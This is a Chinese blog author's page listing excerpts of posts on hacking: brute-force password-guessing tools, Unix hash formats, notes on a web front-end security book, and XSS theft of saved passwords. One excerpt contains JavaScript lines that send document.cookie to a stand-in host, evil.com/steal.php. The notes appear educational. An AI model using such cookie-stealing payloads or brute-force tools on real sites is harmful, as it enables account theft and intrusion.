黑客
wcc526
这个作者很懒,什么都没留下…
展开
-
黑客技术提高
一.远程口令猜解 流行与常用的工具包括Legion,enum,SMBGrind,NTScan.国内比较流行XScan 远程桌面 3389 端口常用猜解TSGrinder,Brutik,Fast RDP Brute,DUBrute MS SQL 1433端口 1434 端口 使用sqlbf,Auto-SQL原创 2013-10-28 16:12:29 · 2881 阅读 · 0 评论 -
黑客之密码破解
---------------*nix系------------------------系统:ES(Unix)例子: IvS7aeT4NzQPM说明:Linux或者其他linux内核系统中长度: 13 个字符描述:第1、2位为salt,例子中的'Iv'位salt,后面的为hash值系统:MD5(Unix)例子:$1$12345678$XM4P3PrKBgKNnTaq原创 2013-11-12 20:44:24 · 57133 阅读 · 0 评论 -
搜狗没漏洞,是漏气了!
转载自http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5MzY0MTQ0NQ%3D%3D&appmsgid=10000006&itemidx=1&sign=84f1db6d3008516b4fdca4667ac66dd7&scene=1&uin=NDg3NzU0NQ%3D%3D昨天,搜狗又被狂黑了。对搜狗被黑本身不来气的,来气的是,搜狗本身漏原创 2013-11-06 14:51:40 · 1601 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记3 余弦老师的渗透利器
余弦老师的渗透利器http://evilcos.meFirefox下Firebug,调试js,HTTP请求响应观察,Cookie,DOM树观察等;GreaseMonkey,自己改了个Cookie修改脚本,其他同学可以用这款:Original Cookie Injector for Greasemonkey;Noscript,进行一些js的阻断;AutoProxy,翻墙必备;原创 2013-10-29 13:12:38 · 3514 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记3
一.CSS容错性xxxxh1{ font-size:50px; color:red; xxx }h2{color:green;}原创 2013-10-29 14:50:28 · 1712 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记2
一.模拟用户发起浏览器请求 1.1 GET方式,实际上就是一个URLnew Image().src="http://www.evil.com/steal.php"+escape(document.cookie)location.href="http://www.evil.com/steal.php"+escape(document.cookie)原创 2013-10-29 12:35:27 · 1851 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记4
来自http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x02.txtXSS Hack:获取浏览器记住的明文密码余弦(@evilcos)evilcos@gmail.com[AT]knownsec team[AT]xeye team0x01. XSS获取明文密码的多种方式我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5原创 2013-10-29 20:10:37 · 1614 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记5
一.开启路由器远程访问能力 大多数使用的是FAST 54M 无线宽带路由器,可以构造如下页面原创 2013-10-29 20:36:09 · 1264 阅读 · 0 评论 -
黑客技术入门
一.网络接口层 1.1 以太网协议 安全缺陷:共享传输媒介并明文传输 攻击技术:网络嗅探与协议分析原创 2013-10-28 13:50:42 · 4901 阅读 · 0 评论 -
BMP图片中注入恶意JS代码
BMP图片中注入恶意JS代码原创 2013-10-28 15:32:24 · 3851 阅读 · 0 评论 -
Web前端黑客技术揭秘 笔记1
一.URL编码方式 编码escape 解码 unescape 编码encodeURI 解码decodeURI 编码encodeURIComponent 解码decodeURIComponent原创 2013-10-28 21:48:43 · 1510 阅读 · 0 评论